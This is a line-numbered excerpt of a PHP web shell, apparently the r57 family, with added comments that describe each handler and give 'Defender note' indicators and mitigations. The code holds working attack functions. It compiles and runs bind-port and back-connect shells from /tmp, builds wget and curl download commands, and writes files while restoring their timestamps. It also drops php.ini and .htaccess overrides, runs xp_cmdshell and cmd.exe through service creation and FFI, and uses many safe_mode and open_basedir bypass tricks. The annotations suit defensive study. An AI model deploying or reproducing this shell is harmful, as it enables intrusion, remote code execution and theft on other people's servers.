  1960.  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  1961.  echo "</div>";
  1962.  echo "</font>";
  1963.  echo "</form>";
  1964.  echo "</td></tr></table>";
  1965.  exit();
  1966.  }
  1967.  }
  // Handler for the "save_file" action: overwrites the file named by e_name
  // with the e_text request field.
  // The file's modification time is read BEFORE the write and restored with
  // touch() afterwards (as both mtime and atime), so the edit does not show
  // up as a changed modification time.
  // Defender note: on a host where this shell has run, mtime is not a
  // reliable triage signal. touch() cannot set the inode change time, so
  // ctime, content hashes and file-integrity baselines remain usable.
  // The handle returned by fopen() is not closed in this block.
  1968. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  1969.  {
  1970.  $mtime = @filemtime($_POST['e_name']);
  1971.  if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
  1972.  else {
  // CRLF from the browser textarea is normalised to LF when $unix is set
  // ($unix is defined outside this excerpt).
  1973.  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  1974.  @fwrite($file,$_POST['e_text']);
  1975.  @touch($_POST['e_name'],$mtime,$mtime);
  1976.  $_POST['cmd']="";
  1977.  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  1978.  }
  1979.  }
  // Runs when port and bind_pass are supplied with use=C: writes the C source
  // held in $port_bind_bd_c to /tmp/bd.c, compiles it with gcc to /tmp/bd,
  // deletes the source, then starts /tmp/bd in the background with the port
  // and bind_pass request fields as arguments (unescaped).
  // cf(), ex() and $port_bind_bd_c are defined outside this excerpt; the
  // variable name suggests a port-binding backdoor - confirm against the payload.
  // Defender note: indicators visible here are gcc spawned by the web-server
  // account, the paths /tmp/bd.c and /tmp/bd, and a process running from /tmp.
  // Mounting /tmp noexec, keeping compilers off production web hosts and
  // restricting process-spawning functions via disable_functions reduce exposure.
  1980. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  1981. {
  1982.  cf("/tmp/bd.c",$port_bind_bd_c);
  1983.  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
  1984.  @unlink("/tmp/bd.c");
  1985.  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
  // The displayed command is replaced by a process listing filtered for "bd".
  1986.  $_POST['cmd']="ps -aux | grep bd";
  1987. }
  // Three independent triggers that drop a configuration-style file into the
  // script's current working directory through cf():
  //   php_ini1 -> "php.ini"   (content from $php_ini1)
  //   htacces  -> ".htaccess" (content from $htacces)
  //   file_ini -> "ini.php"   (content from $sni_res)
  // cf() and the three content variables are defined outside this excerpt;
  // presumably the files override PHP/Apache settings - confirm against them.
  // $_POST['cmd'] is overwritten with a status message after each write.
  // Defender note: a new php.ini, .htaccess or ini.php appearing inside a web
  // root is a strong indicator. Monitoring web roots for these names and
  // disabling per-directory overrides (e.g. Apache "AllowOverride None")
  // limits what such files can change.
  1988. if (!empty($_POST['php_ini1']))
  1989. {
  1990.  cf("php.ini",$php_ini1);
  1991.   $_POST['cmd']=" Da write xong php.ini ! F5 nao !!!";
  1992.  }
  1993.  if (!empty($_POST['htacces']))
  1994. {
  1995.  cf(".htaccess",$htacces);
  1996.   $_POST['cmd']="Da write xong htaccess ! F5 di nao !!!";
  1997.  }
  1998.   if (!empty($_POST['file_ini']))
  1999. {
  2000.  cf("ini.php",$sni_res);
  2001.  
  2002.   $_POST['cmd']="Try again :D";
  2003.  }
  // Perl variant of the port/bind_pass trigger: writes $port_bind_bd_pl to
  // /tmp/bdpl and launches it in the background with the located perl binary,
  // passing only the port request field (unescaped) on the command line.
  // cf(), which(), ex() and $port_bind_bd_pl are defined outside this excerpt.
  // Defender note: indicators are the file /tmp/bdpl and a perl process
  // started by the web-server account with a /tmp script as its argument.
  2004. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
  2005. {
  2006.  cf("/tmp/bdpl",$port_bind_bd_pl);
  2007.  $p2=which("perl");
  2008.  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
  2009.  $_POST['cmd']="ps -aux | grep bdpl";
  2010. }
  // Two triggers keyed on the ip and port request fields. With use=Perl the
  // script in $back_connect is written to /tmp/back and run with perl; with
  // use=C the source in $back_connect_c is written to /tmp/back.c, compiled
  // to /tmp/backc with gcc, the source deleted and the binary run. Both are
  // started in the background with ip and port as unescaped arguments.
  // The payload variables, cf(), which() and ex() are defined outside this
  // excerpt; the echoed message indicates an outbound connection attempt.
  // Defender note: indicators are /tmp/back, /tmp/back.c, /tmp/backc, gcc or
  // perl children of the web-server account, and new outbound connections
  // from the web host. Default-deny egress filtering for web servers is the
  // control that most directly blocks this path.
  2011. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
  2012. {
  2013.  cf("/tmp/back",$back_connect);
  2014.  $p2=which("perl");
  2015.  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
  2016.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  2017. }
  2018. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
  2019. {
  2020.  cf("/tmp/back.c",$back_connect_c);
  2021.  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
  2022.  @unlink("/tmp/back.c");
  2023.  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
  2024.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  2025. }
  2026. if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
  // Upload handler: iterates over up to five multipart fields named
  // userfile0 .. userfile4 and moves each received file to
  // <dir>/<name>, where dir comes from the POST field and name is the
  // client-supplied file name (or new_name for the first slot only).
  // Neither the directory nor the file name is validated, and the error
  // message echoes the client file name without escaping.
  // Defender note: multipart requests with userfile0-userfile4 and new_name
  // fields are an indicator; newly written executable-by-interpreter files
  // in web-served directories are the effect to monitor for.
  2027. for($upl=0;$upl<=4;$upl++)
  2028. {
  2029.  if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
  2030.   if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
  2031.   else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
  2032.   @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
  2033.   or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
  2034.  }
  2035. }
  // Remote-fetch handler: when with, rem_file and loc_file are all supplied,
  // rewrites $_POST['cmd'] into a download command for the chosen client
  // (wget, fetch, lynx, links, GET or curl). The URL and destination path are
  // concatenated into the command line without escaping.
  // Nothing is executed here; the string is left in $_POST['cmd'] for the
  // later ex() call in this file. which() is defined outside this excerpt.
  // The case labels are bare words rather than quoted strings.
  // Defender note: download utilities spawned as children of the web-server
  // or PHP process, and outbound HTTP/FTP from a web host to unfamiliar
  // destinations, are the signals; egress filtering limits this staging path.
  2036. if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
  2037. {
  2038.  switch($_POST['with'])
  2039.  {
  2040.  case wget:
  2041.  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
  2042.  break;
  2043.  case fetch:
  2044.  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
  2045.  break;
  2046.  case lynx:
  2047.  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  2048.  break;
  2049.  case links:
  2050.  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  2051.  break;
  2052.  case GET:
  2053.  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  2054.  break;
  2055.  case curl:
  2056.  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
  2057.  break;
  2058.  }
  2059. }
  // Handler for "ftp_file_up" / "ftp_file_down": connects to the host:port in
  // ftp_server_port (port defaults to 21, 10 second timeout), logs in with
  // the supplied credentials and transfers one file in the requested mode.
  // For downloads, a loc_file equal to $dir is expanded to $dir plus the
  // base name of the remote file. err() and $unix are defined outside this
  // excerpt. All FTP calls are @-suppressed.
  // Defender note: this moves files between the web host and an arbitrary
  // FTP server, so it can serve both for staging files and for copying data
  // off the host. Outbound FTP from a web server is rarely legitimate and is
  // a good candidate for an egress block plus alert.
  2060. if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
  2061.  {
  2062.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  2063.  if(empty($ftp_port)) { $ftp_port = 21; }
  2064.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  2065.  if(!$connection) { err(3); }
  2066.  else
  2067.   {
  2068.   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
  2069.   else
  2070.    {
  2071.    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
  2072.    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);     }
  2073.    }
  2074.   }
  // Closed unconditionally, including when the connection attempt failed.
  2075.  @ftp_close($connection);
  2076.  $_POST['cmd'] = "";
  2077.  }
  // Pre-flight for the "ftp_brute" action: checks that the target in
  // ftp_server_port is reachable (port defaults to 21) and that get_users()
  // returns a non-empty list, stored in $users. On either failure the action
  // is cleared so the login loop later in this file does not run.
  // get_users() and err() are defined outside this excerpt.
  2078. if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
  2079.  {
  2080.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  2081.  if(empty($ftp_port)) { $ftp_port = 21; }
  2082.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  2083.  if(!$connection) { err(3); $_POST['cmd'] = ""; }
  2084.  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><font color=#2aff00 face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
  2085.  @ftp_close($connection);
  2086.  }
  2087. echo $table_up3;
  2088. if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("dir -ao"); }
  2089. else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
  2090. echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td class=main><b><div align=center><textarea name=report cols=121 rows=15 spellcheck='false'>";
  // dozip1($link, $file): copies everything readable from $link into $file.
  // $link is opened with fopen() in read mode and consumed in 1024-byte
  // chunks into memory; $file is then opened for writing (truncating it) and
  // the buffer written out.
  // The caller below passes the funzip and fzip request fields unchanged, so
  // both source and destination are attacker-chosen.
  // NOTE(review): neither fopen() result is checked and $cont is not
  // initialised before the first append.
  // Defender note: because fopen() accepts URL wrappers when allow_url_fopen
  // is enabled, this can pull remote content onto disk; setting
  // allow_url_fopen=Off and alerting on new files in web roots are the
  // relevant controls.
  2091. function dozip1($link,$file)
  2092. {
  2093.    $fp = @fopen($link,"r");
  2094.    while(!feof($fp))
  2095.    {
  2096.        $cont.= fread($fp,1024);
  2097.    }
  2098.    fclose($fp);
  2099.    $fp2 = @fopen($file,"w");
  2100.    fwrite($fp2,$cont);
  2101.    fclose($fp2);
  2102. }
  2103. if (isset($_POST['funzip']))
  2104. {
  2105. dozip1($_POST['funzip'],$_POST['fzip']);
  2106. }
  // Directory-name enumeration driven by the "root" request field.
  // For every 1- to 4-character prefix drawn from $chars, glob("<root>/<prefix>*")
  // is called and its return value discarded. Progress is detected only by
  // checking whether the last element of the global $D changed, and in this
  // excerpt $D is written solely by eh() below, which extracts a path from
  // safe_mode restriction warnings. The listing therefore comes from error
  // messages rather than from glob() results.
  // NOTE(review): the set_error_handler() registration for eh() is not in
  // this excerpt - confirm where it happens.
  // Deeper prefixes are only tried when the shorter prefix produced a new entry.
  // Defender note: the approach depends on the safe_mode warning text, so it
  // is only meaningful on PHP versions that still implement safe_mode
  // (removed in PHP 5.4). Requests carrying a "root" field that trigger a
  // burst of glob() warnings are the observable.
  2107. if(empty($_POST['root'])){
  2108. } else {
  2109.    $root = $_POST['root']; }
  2110.   $c = 0; $D = array();
  2111.   $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  2112.   for($i=0; $i < strlen($chars); $i++){
  2113.   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
  2114.   $prevD = $D[count($D)-1];
  2115.   glob($path."*");
  2116.         if($D[count($D)-1] != $prevD){
  2117.         for($j=0; $j < strlen($chars); $j++){
  2118.            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
  2119.            $prevD2 = $D[count($D)-1];
  2120.            glob($path."*");
  2121.               if($D[count($D)-1] != $prevD2){
  2122.                  for($p=0; $p < strlen($chars); $p++){
  2123.                  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  2124.                  $prevD3 = $D[count($D)-1];
  2125.                  glob($path."*");
  2126.                     if($D[count($D)-1] != $prevD3){
  2127.                        for($r=0; $r < strlen($chars); $r++){
  2128.                        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  2129.                        glob($path."*");
  2130.                        }
  2131.                     }
  2132.                  }
  2133.               }
  2134.         }
  2135.         }
  2136.   }
  // De-duplicate the collected names and print them, one per line, only when
  // the request actually carried a "root" parameter.
  2137.   $D = array_unique($D);
  2138.   foreach($D as $item)
  2139.   if(isset($_REQUEST['root']))
  2140.   echo "{$item}\n";
  // eh($errno, $errstr, $errfile, $errline): has the signature of a PHP error
  // handler. It matches $errstr against the safe_mode restriction warning
  // text and, on a match, appends the second capture group (the text between
  // "is not allowed to access" and "owned by uid") to the global array $D,
  // advancing the global counter $c.
  // NOTE(review): registration via set_error_handler() is not visible in
  // this excerpt. The global $i is declared but not used in the body.
  // Defender note: this turns warning text into a file-name oracle, so a
  // restriction's error message is itself an information leak.
  2141.   function eh($errno, $errstr, $errfile, $errline){
  2142.      global $D, $c, $i;
  2143.      preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
  2144.      if($o){ $D[$c] = $o[2]; $c++;}
  2145.   }
  2146. if($safe_mode)
  2147. {
  2148.  switch($_POST['cmd'])
  2149.  {
  2150.  case 'safe_dir':
  2151.   $d=@dir($dir);
  2152.   if ($d)
  2153.    {
  2154.    while (false!==($file=$d->read()))
  2155.     {
  2156.      if ($file=="." || $file=="..") continue;
  2157.      @clearstatcache();
  2158.      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
  2159.      if(!$unix){
  2160.      echo date("d.m.Y H:i",$mtime);
  2161.      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
  2162.      }
  2163.      else{
  2164.      $owner = @posix_getpwuid($uid);
  2165.      $grgid = @posix_getgrgid($gid);
  2166.      echo $inode." ";
  2167.      echo perms(@fileperms($file));
  2168.      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
  2169.      echo date("d.m.Y H:i ",$mtime);
  2170.      }
  2171.      echo "$file\n";
  2172.     }
  2173.    $d->close();
  2174.    }
  2175.   else echo $lang[$language._text29];
  2176.  break;
  2177.  case 'copy':
  2178. if(empty($snn)){
  2179. if(empty($_GET['snn'])){
  2180. if(empty($_POST['snn'])){
  2181. } else {
  2182. $u1p=$_POST['snn'];
  2183. }
  2184. } else {
  2185. $u1p=$_GET['snn'];
  2186. }
  2187. }
  2188. break;
  2189.   case 'test1':
  2190.   $ci = @curl_init("file://".$_POST['test1_file']."");
  2191.   $cf = @curl_exec($ci);
  2192.   echo $cf;
  2193.   break;
  2194.   case 'test4':
  2195.   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  2196.   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  2197.   if($db)
  2198.    {
  2199.    if(@mssql_select_db($_POST['test4_md'],$db))
  2200.     {
  2201.      @mssql_query("drop table r57_temp_table",$db);
  2202.      @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
  2203.      @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
  2204.      $res = mssql_query("select * from r57_temp_table",$db);
  2205.      while(($row=@mssql_fetch_row($res)))
  2206.       {
  2207.       echo $row[0]."\r\n";
  2208.       }
  2209.     @mssql_query("drop table r57_temp_table",$db);
  2210.     }
  2211.     else echo "[-] ERROR! Can't select database";
  2212.    @mssql_close($db);
  2213.    }
  2214.   else echo "[-] ERROR! Can't connect to MSSQL server";
  2215.   break;
  2216. case 'cURL':
  2217.    if(empty($_POST['ly0kha'])){
  2218. } else {
  2219. $curl=$_POST['ly0kha'];
  2220. $ch1 =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
  2221. curl_exec($ch1);
  2222. echo "</textarea></CENTER>";
  2223. }
  2224. break;
  2225. case 'copy':
  2226. if(empty($snn)){
  2227. if(empty($_GET['snn'])){
  2228. if(empty($_POST['snn'])){
  2229. } else {
  2230. $u1p=$_POST['snn'];
  2231. }
  2232. } else {
  2233. $u1p=$_GET['snn'];
  2234. }
  2235. }
  2236.   $u1p="";
  2237. $tymczas="";
  2238. $temp=tempnam($tymczas, "cx");
  2239. if(copy("compress.zlib://".$snn, $temp)){
  2240. $zrodlo = fopen($temp, "r");
  2241. $tekst = fread($zrodlo, filesize($temp));
  2242. fclose($zrodlo);
  2243. echo "".htmlspecialchars($tekst)."";
  2244. unlink($temp);
  2245. echo "</textarea></CENTER>";
  2246. }
  2247. break;
  2248. case 'ini_restore':
  2249.  if(empty($_POST['ini_restore'])){
  2250. } else {
  2251. $ini=$_POST['ini_restore'];
  2252. echo ini_get("safe_mode");
  2253. echo ini_get("open_basedir");
  2254. require_once("$ini");
  2255. ini_restore("safe_mode");
  2256. ini_restore("open_basedir");
  2257. echo ini_get("safe_mode");
  2258. echo ini_get("open_basedir");
  2259. include($_GET["ss"]);
  2260. echo "</textarea></CENTER>";
  2261. }
  2262. break;
  2263. case 'glob':
  2264. function reg_glob()
  2265. {
  2266. $chemin=$_REQUEST['glob'];
  2267. $files = glob("$chemin*");
  2268. foreach ($files as $filename) {
  2269.    echo "$filename\n";
  2270. }
  2271. }
  2272. if(isset($_REQUEST['glob']))
  2273. {
  2274. reg_glob();
  2275. }
  2276. break;
  2277. case 'zend':
  2278.  if(empty($_POST['zend'])){
  2279. } else {
  2280. $dezend=$_POST['zend'];
  2281. include($_POST['zend']);
  2282. print_r($GLOBALS);
  2283. require_once("$dezend");
  2284. echo "</textarea></p>";
  2285. }
  2286. break;
  2287.   case 'plugin':
  2288.   if ($_POST['plugin'] )
  2289.   {
  2290. $i = 0;
  2291. while ($i < 60000) {
  2292.     $line = posix_getpwuid($i);
  2293.     if (!empty($line)) {
  2294.         while (list ($key, $vl) = each($line)){
  2295.             echo $vl."\n";
  2296.             break;
  2297.         }
  2298.     }
  2299.      $i++;
  2300. }
  2301.  
  2302.              }
  2303.         break;
  2304.     case 'test14':
  2305.   $ioncube = @ioncube_read_file($_POST['test14_cmd']);
  2306.   echo htmlspecialchars($ioncube);
  2307.   break;
  2308.   case 'test15':
  2309.   $tmp = '';
  2310.   if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  2311.   elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  2312.   elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  2313.   elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  2314.   else break;
  2315.   @unlink($tmp.'/result_test15.txt');
  2316.   @win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
  2317.   while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
  2318.   $lines = @file ($tmp.'/result_test15.txt');
  2319.   if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
  2320.   @unlink($tmp.'/result_test15.txt');
  2321.   break;
  2322.   case 'test16':
  2323.   $tmp = '';
  2324.   if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  2325.   elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  2326.   if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  2327.   elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  2328.   else break;
  2329.   $name=$tmp."\\".uniqid();
  2330.   $n=uniqid();
  2331.   $cmd=(empty($_SERVER['COMSPEC']))?'c:\\windows\\system32\\cmd.exe':$_SERVER['COMSPEC'];
  2332.   win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
  2333.   while(!file_exists($name)) sleep(1);
  2334.   $exec=file_get_contents($name);
  2335.   unlink($name);
  2336.   echo htmlspecialchars($exec);
  2337.   break;
  2338.   case 'test18':
  2339.   if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  2340.   elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  2341.   if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  2342.   elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  2343.   else break;
  2344.   $name=$tmp."\\".uniqid();
  2345.   $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  2346.   $res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
  2347.   while(!file_exists($name)) sleep(1);
  2348.   $exec=file_get_contents($name);
  2349.   unlink($name);
  2350.   echo htmlspecialchars($exec);
  2351.   break;
  2352.   case 'test19':
  2353. if(Empty($test19) aNd Empty($_GET['test19']) aNd Empty($_POST['test19'])) diE("\n".$karatonik);
  2354. if(!empty($_GET['test19'])) $file=$_GET['test19'];
  2355. if(!empty($_POST['test19'])) $file=$_POST['test19'];
  2356. if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("<B><br>Shell by TheSunOfVN</B></FONT>");
  2357. elseif(!emptY($file)) die("Sorry... File ".htmlspecialchars($file)."doesn't exists or you don't have permissions");Beark;
  2358. case 'test20':
  2359.   $error_reporting = @ini_get('error_reporting');
  2360.   error_reporting(E_ALL ^ E_NOTICE);
  2361.   @ini_set("display_errors", 1);
  2362.   @ini_alter("display_errors", 1);
  2363.   $str=@fopen($_POST['test20_file'],"r");
  2364.   while(!feof($str)){print htmlspecialchars(fgets($str));}
  2365.   fclose($str);
  2366.   error_reporting($error_reporting);
  2367.   break;
  2368. case 'test21':
  2369. $filen=$_POST['test21_file'];
  2370. @fopen('srpath://../../../../../../../../../../../'.$_POST['test21_file'],"a");
  2371. if (file_exists($filen))
  2372. {
  2373. echo $lang[$language.'_text61'];
  2374. }
  2375. else
  2376. echo "Can't write file";
  2377.   break;
  2378. case 'test22':
  2379.        echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
  2380.        if(!$dir){$dir='/etc/';};
  2381.        if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
  2382.        if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
  2383.  
  2384.        if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
  2385.        if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
  2386.        foreach($presets_rlph as $preset_rlph){
  2387.            if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
  2388.        }
  2389.        for($i=0; $i < strlen($chars_rlph); $i++){
  2390.           if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
  2391.           if($n_rlph<=1){continue;};
  2392.           for($j=0; $j < strlen($chars_rlph); $j++){
  2393.              if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
  2394.              if($n_rlph<=2){continue;};
  2395.              for($x=0; $x < strlen($chars_rlph); $x++){
  2396.                 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
  2397.                 if($n_rlph<=3){continue;};
  2398.                 for($y=0; $y < strlen($chars_rlph); $y++){
  2399.                    if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
  2400.                    if($n_rlph<=4){continue;};
  2401.                    for($z=0; $z < strlen($chars_rlph); $z++){
  2402.                       if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
  2403.                       if($n_rlph<=5){continue;};
  2404.                       for($w=0; $w < strlen($chars_rlph); $w++){
  2405.                          if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
  2406.                       }
  2407.                    }
  2408.                  }
  2409.               }
  2410.           }
  2411.        }
  2412.        echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
  2413.  break;
  2414. case 'test23':
  2415.   @session_save_path($_POST['test23_file2']."\0;$tempdir");
  2416.   @$_SESSION[php]=$_POST['test23_file1'];
  2417.   $filen=$_POST['test23_file2'];
  2418.     if(file_exists($filen))
  2419.     echo $lang[$language.'_text61']."  ".$filen;
  2420.     else
  2421.   echo "Can't write file";
  2422.   break;
  2423. case 'test24':
  2424. @putenv("TMPDIR=".$_POST['test24_file2']);
  2425.   @ini_set("session.save_path", "");
  2426.   @ini_alter("session.save_path", "");
  2427.   @$_SESSION[php]=$_POST['test24_file1'];
  2428.   $filen=$_POST['test24_file2'];
  2429.   if(file_exists($filen))
  2430.   echo $lang[$language.'_text61']."  ".$filen;
  2431.   else
  2432.   echo "Can't write file";
  2433.   break;
  2434. case 'test25':
  2435.   @readfile($_POST['test25_file1'], 3, "php://../../../../../../../../../../../".$_POST['test24_file2']);
  2436.   $filen=$_POST['test25_file2'];
  2437.   if(file_exists($filen))
  2438.   echo $lang[$language.'_text61'];
  2439.   else
  2440.   echo "Can't write file";
  2441.   break;
  2442.    case 'file1':
  2443. if(!empty($_POST['file1']))
  2444.  $file1=$_POST['file1'];
  2445.   $level=0;
  2446.   if(!file_exists("file1:"))
  2447.         mkdir("file1:");
  2448.   chdir("file1:");
  2449.   $level++;
  2450.   $hardstyle = explode("/", $file1);
  2451.   for($a=0;$a<count($hardstyle);$a++){
  2452.         if(!empty($hardstyle[$a])){
  2453.                 if(!file_exists($hardstyle[$a]))
  2454.                         mkdir($hardstyle[$a]);
  2455.                 chdir($hardstyle[$a]);
  2456.                 $level++;
  2457.         }
  2458.   }
  2459.   while($level--) chdir("..");
  2460.   $ch = curl_init();
  2461.   curl_setopt($ch, CURLOPT_URL, "file1:file1:///".$file1);
  2462.   if(FALSE==curl_exec($ch))
  2463.         die('>Sorry... File '.htmlspecialchars($file1).' doesnt exists or you dont have permissions.');
  2464.   curl_close($ch);
  2465. break;
  2466.   case 'file':
  2467. if(!empty($_POST['file']))
  2468.  $file=$_POST['file'];
  2469.   $level=0;
  2470.   if(!file_exists("file:"))
  2471.         mkdir("file:");
  2472.   chdir("file:");
  2473.   $level++;
  2474.   $hardstyle = explode("/", $file);
  2475.   for($a=0;$a<count($hardstyle);$a++){
  2476.         if(!empty($hardstyle[$a])){
  2477.                 if(!file_exists($hardstyle[$a]))
  2478.                         mkdir($hardstyle[$a]);
  2479.                 chdir($hardstyle[$a]);
  2480.                 $level++;
  2481.         }
  2482.   }
  2483.   while($level--) chdir("..");
  2484.   $ch = curl_init();
  2485.   curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  2486.   if(FALSE==curl_exec($ch))
  2487.         die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  2488.   curl_close($ch);
  2489. break;
  2490.  }
  2491. }
